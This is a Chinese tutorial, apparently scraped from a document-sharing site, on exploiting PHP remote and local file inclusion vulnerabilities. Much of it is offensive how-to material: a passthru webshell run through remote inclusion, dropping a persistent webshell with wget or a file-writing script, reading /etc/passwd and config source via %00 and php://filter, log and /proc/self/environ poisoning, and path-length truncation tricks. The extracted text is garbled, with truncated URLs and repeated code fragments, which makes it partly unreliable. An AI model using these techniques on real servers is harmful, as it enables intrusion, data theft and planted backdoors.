PHP文件包含漏洞详解

《PHP文件包含漏洞详解》由会员分享，可在线阅读，更多相关《PHP文件包含漏洞详解（11页珍藏版）》请在装配图网上搜索。

1、PHP 文件包含漏洞详解 一、什么才是“远程文件包含漏洞”？回答是：服务器通过php 的特性（函数）去包含任意文件时，由于要包含的这个文件来源过滤不严，从而可以去包含一个恶意文件，而我们可以构造这个恶意文件来达到邪恶的目的。涉及到的危险函数：include（），require（）和include_once（），require_once（）Include：包含并运行指定文件，当包含外部文件发生错误时，系统给出警告，但整个php 文件继续执行。Require：跟include 唯一不同的是，当产生错误时候，include 下面继续运行而require 停止运行了。Include_once：这个函数

2、跟include 函数作用几乎相同，只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。Require_once：这个函数跟require 的区别 跟上面我所讲的include 和 include_once 是一样的。所以我就不重复了。php.ini 配置文件：allow_url_fopen=off 即不可以包含远程文件。Php4 存在远程&本地，php5 仅存在本地包含。二、为什么要包含文件？程序员写程序的时候，不喜欢干同样的事情，也不喜欢把同样的代码（比如一些公用的函数）写几次，于是就把需要公用的代码写在一个单独的文件里面，比 如 share.php，而后在其

3、它文件进行包含调用。在php 里，我们就是使用上面列举的那几个函数来达到这个目的的，它的工作流程：如果你想 在 main.php里包含share.php，我将这样写include（“share.php”）就达到目的，然后就可以使用share.php 中的 函数了，像这个写死需要包含的文件名称的自然没有什么问题，也不会出现漏洞，那么问题到底是出在哪里呢？有的时候可能不能确定需要包含哪个文件，比如先来看下面这个文件index.php 的代码：if（$_GETpage）include$_GETpage；else include“home.php”；很正常的一段PHP 代码，它是怎么运作的呢？上面这段

4、代码的使用格式可能是这样的：http:/ 或者 http:/ 结合上面代码，简单说下怎么运作的：1.提交上面这个URL，在index.php 中就取得这个page 的值（$_GETpage）。2.判断$_GETpage是不是空，若不空（这里是main.php）就用include 来包含这个文件。3.若$_GETpage空的话就执行else，来 include“home.php”这个文件。三、为什么会产生漏洞？你也许要说，这样很好呀，可以按照URL 来动态包含文件，多么方便呀，怎么产生漏洞的呢？问题的答案是：我们不乖巧，我们总喜欢和别人不一样，我们 不会按照他的链接来操作，我们可能想自己写想包含

5、（调用）的文件，比如我们会随便的打入下面这个URL：http：/ 程序就傻傻按照上面我们说得步骤去执行：取 page 为 hello.php，然后去include（hello.php），这时问题出现了，因为我们并没有hello.php 这个文件，所以 它 include 的时候就会报警告，类似下列信息：Warning：include（hello.php）function.include：failed to open stream：No such file or directory in/vhost/wwwroot/php/index.php on line 3 Warning：include（

6、）function.include：Failed opening hello.php for inclusion（include_path=。：）in/vhost/wwwroot/php/index.php on line 3 注意上面的那个Warning 就是找不到我们指定的hello.php 文件，也就是包含不到我们指定路径的文件；而后面的警告是因为前面没有找到指定文件，所以包含的时候就出警告了。四、如何利用？上面可以看到，问题出现了，那么我们怎么利用这样的漏洞呢，利用方法其实很多，但是实质上都是差不多的，我这里说三个比较常见的利用方法：1.包含读出目标机上其它文件 由前面我们可以看到，由

7、于对取得的参数page 没有过滤，于是我们可以任意指定目标主机上的其它敏感文件，例如在前面的警告中，我们可以看到暴露的绝对路径（vhost/wwwroot/php/），那么我们就可以多次探测来包含其它文件，比如指定URL 为：http:/ 可以读出当前路径下的txt.txt 文件，也可以使用/进行目录跳转（在没过滤/的情况下）；也可以直接指定绝对路径，读取敏感的系统文件，比如这个URL：http:/ 的权限比较高，是可以读出 这个文件内容的。否则就会得到一个类似于：open_basedir restriction in effect.的 Warning（这里是由于apache 的 open_b

8、asedir 中限制了访问目录）。2.远程文件包含可运行的PHP 木马 如果目标主机的“allow_url_fopen”是激活的（默认是激活的，没几个人会修改），我们就可以有更大的利用空间，我们可以指定其它 URL 上的一个包含PHP 代码的webshell 来直接运行，比如，我先写一段运行命令的PHP 代码，如下保存为cmd.txt（后缀不重要，只要内容为 PHP 格式就可以了）。if（get_magic_quotes_gpc（）$_REQUESTcmd=stripslashes（$_REQUESTcmd）；/去掉转义字符（可去掉字符串中的反斜线字符）ini_set（“max_executi

9、on_time”，0）；/设定针对这个文件的执行时间，0 为不限制。echo“M4R10开始行”；/打印的返回的开始行提示信息 passthru（$_REQUESTcmd）；/运行cmd 指定的命令 echo“M4R10结束行”；/打印的返回的结束行提示信息 以上这个文件的作用就是接受cmd 指定的命令，并调用passthru 函数执行，把内容返回在M4R10 开始行与M4R10结束行之间。把这个文件 保存到我们主机的服务器上（可以是不支持PHP 的主机），只要能通过HTTP 访问到就可以了，例如地址如下：http:/ 来利用了：http:/ 其中cmd 后面的就是你需要执行的命令，其它常 用

10、的命令（以*UNIX 为例）如下：ll 列目录、文件（相当于Windows下 dir）pwd 查看当前绝对路径 id whoami 查看当前用户 wget 下载指定URL 的文件 等等其它的，你主机去BAIDU 找吧，就不列举了。3.包含一个创建文件的PHP 文件（常用）也许有的人认为还是得到目标机上的一个真实的Webshell 比较放心，万一哪天人家发现这儿个包含漏洞修补了，我们就不能再远程包含得到上面的那 个“伪”Webshell了，不是么？可以理解这个心态，我们继续。得到一个真实的Webshell，我们也说两种常见的方法：1）使用wget 之类的命令来下载一个Webshell 这个比较简

11、单，也很常用，在上面我们得到的那个伪webshell 中，我们可以执行命令，那么我们也可以调用系统中的一个很厉害的角色，wget，这个命令的强大你可以google 下，参数一大堆，绝对搞晕你，呵呵，我们不需要那么复杂，我们就使用一个-O（output-document=FILE，把文档写到FILE 文件中）就可以了，呵呵。前提是你在按照前面的步骤放一个包含PHP 代码的Webshell 在一个可以通过HTTP 或者FTP 等可以访问的地方，比 如：http:/ 的内容。然后我们在前面得到的伪 Webshell 中 执行如下的URL：http:/ http:/ m4r10.php 如果当前目录可

12、写，就能得到 一个叫做m4r10.php 的 Webshell 了，如果当前目录不可写，还需要想其它的办法。2）使用文件来创建 前面的wget 可能会遇到当前目录不能写的情况；或者目标主机禁用了（或者没装）这个命令，我们又需要变通一下了，我们可以结合前面的包含文件漏洞来包含一个创建文件（写文件）的PHP 脚本，内容如下：$f=file_get_contents（“http:/ fwrite（$ff，$f）；/把前面打开的文件流写到创建的文件里 fclose（$ff）；/关闭保存文件？$f=file_get_contents（“http:/ fwrite（$ff，$f）；/把前面打开的文件流写到

13、创建的文件里 fclose（$ff）；/关闭保存文件$f=file_get_contents(“http:/ fwrite（$ff，$f）；/把前面打开的文件流写到创建的文件里 fclose（$ff）；/关闭保存文件 还是写入我们上面用wget下载的那个php 文件，但是我们改进了方法，用 PHP 脚本来实现，可以使用上面的cmd.php？cmd=ll 查找可以 写的目录，比如这里的upload，然后把文件创建在这个目录下：。/upload/m4r10.php.然后就得到我们的Webshell 了。4.本地文件包含（常用）典型的漏洞代码：include（$_GETpages.。php）；？in

14、clude（$_GETpages.。php）；include($_GETpages.php);黑盒判断方法：单纯的从URL 判断的话，URL 中 path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候，可能存在文件包含漏洞。本地包含漏洞的利用（这里先忽略截断问题，下面会将截断的方法）1、包含同服务器中上传的jpg、txt、rar 等文件，这个是最理想的情况了。2、包含系统的各种日志，如apache 日志，文件系统日志等 其中apache 当记录格式为combined，一般日志都会很大，基本无法包含成功。包含log 是有自动化攻击程序的。其中鬼子的

15、博客中有提到一个空格的问题。见：邪恶的空格-PHP 本地文件包含漏洞的新突破口http:/huaidan.org/archives/1144.html 解决空格问题其实把一句话base64 加密后再写入就可以执行了。3、包含/proc/self/environ.这个环境变量有访问web 的 session 信息和包含user-agent 的参数。user-agent在客户端是可以修改的。参考：Shell via LFI proc/self/environ method http:/ 4、包含由php 程序本身生成的文件，缓存、模版等，开源的程序成功率大。5、利用本地包含读取PHP 敏感性文件，

16、需要PHP5 以上版本。如看到“config”的源码如下：index.php？pages=php:/filter/read=convert.base64-encode/resource=config 特别的情况用到readfile（）函数不是包含执行，可以直接读源码。6、利用phpinfo 页面getshell.一般大组织的web 群存在phpinfo 的机会挺大的。poc 和介绍参考：利用phpinfo 信息LFI 临时文件 http:/ 7、利用包含出错，或者包含有未初始化变量的PHP 文件，只要变量未初始化就可能再次攻击 具体见：include（）本地文件包含漏洞随想 http:/ 8、

17、结合跨站使用 index.php？pages=http:/127.0.0.1/path/xss.php？xss=phpcode（要考虑域信任问题）9、包含临时文件文件。这个方法很麻烦的。参考：POST method uploads http:/ 解决临时文件删除方法：慢连接（注：前提是 file_uploads=On，5.3.1 中增加了max_file_uploadsphp.ini file_uploads=On，5.3.1 中增加了max_file_uploads，默认最大一次上传20 个）windows 格式：win 下最长4 个随机字符（a-z，A-Z，0-9）如：c：/windows

18、/temp/php3e.tmp linux格式：6 个随机字符（a-z，A-Z，0-9）如：/tmp/phpUs7MxA 慢连接的两种上传代码参考：PHP安全之 LFI 漏洞GetShell 方法大阅兵 http:/ 10、当前实在找不到写权限目录时候，注入到log 中再寻找写权限目录。如注入到log.Linux：index.php？pages=/var/log/apache/logs/error_log%00&x=/&y=uname windows：index.php？pages=apachelogserror.log%00&x=.&y=dir 具体参考PHP 本地文件包含（LFI）漏洞利用

19、 http:/kingbase.org/blog/php_local_file_inclusion_exploit 11、使用php wrapper例如php:/input、php:/filter、data:/等包含文件 在 PHP 5.2.0 and allow_url_include/http:/blog.php-security.org/archives/45-PHP-5.2.0-and-allow_url_include.html 其中文中提到的allow_url_fopen 和 allow_url_include 只是保护了against URL handles 标记为URL.这影响

20、了http（s）and ftp（s）但是并没有影响php 或 date 这些url 形式。12、LFI 判断目录是否存在和列目录，如 *index.php？pages=/var/www/dossierexistant/etc/passwd%00 *这个方法在TTYshell 上是可以完全是可以判断的，但是在URL 上有时候不可行。即使不存在dossierexistant也可以回显passwd 内容。index.php？pages=/var/www/dossierexistant/etc/passwd%00 *FreeBSD directory listing with PHP file fun

21、ctionshttp:/ php-file-functions/列目录 *存在逻辑判断的时候，如不存在该目录就会返回header.php+File not found+footer.php 存在就会返回header.php+footer.php.这种逻辑很符合程序员的习惯。曾经用找到了一个目录很深的日志获得shell.13、包含SESSION 文件，php 保存格式 sess_SESSIONID 默认位置是/tmp/（PHP Sessions）、/var/lib/php/session/（PHP Sessions）、/var/lib/php5/（PHP Sessions）和 c：/window

22、s/temp/（PHP Sessions）等文件中。14、包含/proc/self/cmdline 或者/proc/self/fd/找到log 文件（拥有者为root，默认情况要root 才能访问）具体参考：Local File Inclusion Tricks of the Trade http:/ 的，但是这个文件默认情况也是644.15、包含maillog 通常位置/var/log/maillog 这个方法也很鸡肋，具体参考：local file inclusion tricks 链接找不到了 16、包含固定的文件，非常鸡肋，为了完整性也提下。如：可用中间人攻击。突破限制截断后面的字符串

23、技巧 利用本地包含时常常需要用%00 来截断后面的字符串，但在GPC 为 ON 时%00 是会被转义的，那么还有其他方法么？用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串（推测相对路径可用）看漏洞代码：$webpath=dirname（_FILE_）。/；$filepath=test.txt；for（$i=1；$i$webpath=dirname（_FILE_）。/；$filepath=test.txt；for（$i=1；$i$webpath=dirname（_FILE_）。/；$filepath=test.txt；for（$i=1；$i test.txt 代码：结果截断失败，

24、改下代码：$webpath=dirname（_FILE_）。/；$filepath=test.txt；for（$i=1；$i$webpath=dirname（_FILE_）。/；$filepath=test.txt；for（$i=1；$i$webpath=dirname（_FILE_）。/；$filepath=test.txt；for（$i=1；$i 这次成功。以上是windows 下的方法，其实linux也可以：$a=；for（$i=0；$i$a=；for（$i=0；$i$a=；for（$i=0；$i include 截断 include$_GETaction.php；？include$_G

25、ETaction.php；include$_GETaction.php;提交“action=/etc/passwd%00”中的“%00”将截断后面的“。php”，但是除了“%00”还有没有其他的字符可以实现截断使用呢？肯定有人想到了远程包含的url 里问号“？”的作用，通过提交“action=http:/ 一下：/var5.php 代码：/include$_GETaction.php；/print strlen（realpath（./）+strlen（$_GETaction）；/ini_set（max_execution_time，0）；$str=；for（$i=0；$i /var5.php

26、代码：/include$_GETaction.php；/print strlen（realpath（./）+strlen（$_GETaction）；/ini_set（max_execution_time，0）；$str=；for（$i=0；$i /var5.php 代码：/include$_GETaction.php；/print strlen（realpath（./）+strlen（$_GETaction）；/ini_set（max_execution_time，0）；$str=；for（$i=0；$i 经过测试字符“。”、“/”或者2 个字符的组合，在一定的长度时将被截断，win 系统和*nix 的系统长度不一样，当 win 下 strlen（realpath（./）+strlen（$_GETaction）的长度大于256 时被截断，对于*nix 的长度是4*1024=4096.对于php.ini 里设置远程文件关闭的时候就可以利用上面的技巧包含本地文件了。（此漏洞由cloie#ph4nt0m.org 最先发现）